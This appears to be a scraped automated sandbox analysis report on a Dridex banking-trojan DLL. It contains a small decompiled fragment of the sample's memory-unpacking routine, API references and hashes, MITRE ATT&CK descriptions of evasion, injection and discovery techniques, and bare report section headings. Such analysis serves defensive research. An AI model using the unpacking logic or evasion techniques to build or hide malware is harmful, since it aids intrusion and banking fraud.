						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x003a206e
0x003a207c
0x003a2083
0x003a2086
0x003a2090
0x003a2097
0x003a20a1
0x003a20a7
0x003a20b0
0x003a20b9
0x003a20bc
0x003a20c2
0x003a20c6
0x003a20ce
0x003a20d5
0x003a20d8
0x003a20db
0x003a20de
0x003a20e1
0x003a20fb
0x003a2101
0x003a2104
0x003a210c
0x003a2110
0x003a2113
0x003a2116
0x003a2119
0x003a211c
0x003a2138
0x003a2155
0x003a217a
0x003a217c
0x003a2185
0x003a2188
0x003a2192
0x003a2195
0x003a2198
0x003a219b
0x003a219e
0x003a236f
0x003a236f
0x003a22ce
0x003a22d4
0x003a21a9
0x003a21b7
0x003a21bf
0x003a21c2
0x003a21c4
0x003a21ca
0x003a21d6
0x003a21d9
0x003a21dc
0x003a21df
0x003a23b1
0x003a23b1
0x003a22ef
0x003a22f5
0x003a22fb
0x003a2301
0x003a2307
0x003a230d
0x003a2313
0x003a2316
0x003a2319
0x003a2321
0x003a2329
0x003a232f
0x003a2335
0x003a233b
0x003a2341
0x003a234f
0x003a22bb
0x003a22c1
0x003a22c1
0x003a22da
0x003a238e
0x003a2394
0x003a21ea
0x003a21ea
0x003a2204
0x003a2229
0x003a2238
0x003a223b
0x003a223f
0x003a2243
0x003a224a
0x003a2250
0x003a2252
0x003a225b
0x003a226c
0x003a2272
0x003a2278
0x003a227b
0x00000000
0x00000000
0x003a2281
0x00000000
0x003a21ea
0x003a22aa

APIs

VirtualProtect.KERNELBASE ref: 003A20E1
VirtualProtect.KERNELBASE ref: 003A217A

Strings

\, xrefs: 003A2321

Memory Dump Source

Source File: 0000000E.00000002.682807926.00000000003A0000.00000040.00000010.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 0cf43546c1e24f3862e028629dd216fa199f9965bef755288628a595c80042f1
Instruction ID: 5cb62c2bf93ea979d7b0bfc0db8ced73ce1ff0549774e3b7e9d18fd97f98f48b
Opcode Fuzzy Hash: 0cf43546c1e24f3862e028629dd216fa199f9965bef755288628a595c80042f1
Instruction Fuzzy Hash: AA91BEB4D042188FDB04CF99C580A9EFBF1FF49310F25856AE958AB352D334A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003A21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003A2250

Strings

\, xrefs: 003A2321

Memory Dump Source

Source File: 0000000E.00000002.682807926.00000000003A0000.00000040.00000010.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: d652fdb95fe991c5ebf601d006122628cd2b539fbc1bccbda13cedd4b49a9f19
Instruction ID: c13d754f1a9ead1c02d123c158ef2ced78f28a16be3a9c43d9f562489bd7b7c3
Opcode Fuzzy Hash: d652fdb95fe991c5ebf601d006122628cd2b539fbc1bccbda13cedd4b49a9f19
Instruction Fuzzy Hash: 9251ADB5E006298FCB14CF59C980A9DBBF1FF89310F6685A9D958A7311D730A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003A1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 003A1F29

Memory Dump Source

Source File: 0000000E.00000002.682807926.00000000003A0000.00000040.00000010.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: bd0ec20f0cee6b552a0655be5bd232041d7753b40784d5476ac0917b2af4254b
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 0E41C3B5E052198FDB04DFA8C4946AEBBF1FF48310F15856DE848AB341D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Function 6E9F0754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Function 6E9F223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E9F2840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E9F3110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E9F10C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E9F578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E9F5B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E9F5B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E9F5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E9F5BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E9F5B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E9F5BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E9F5DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E9F5624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E9F5E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON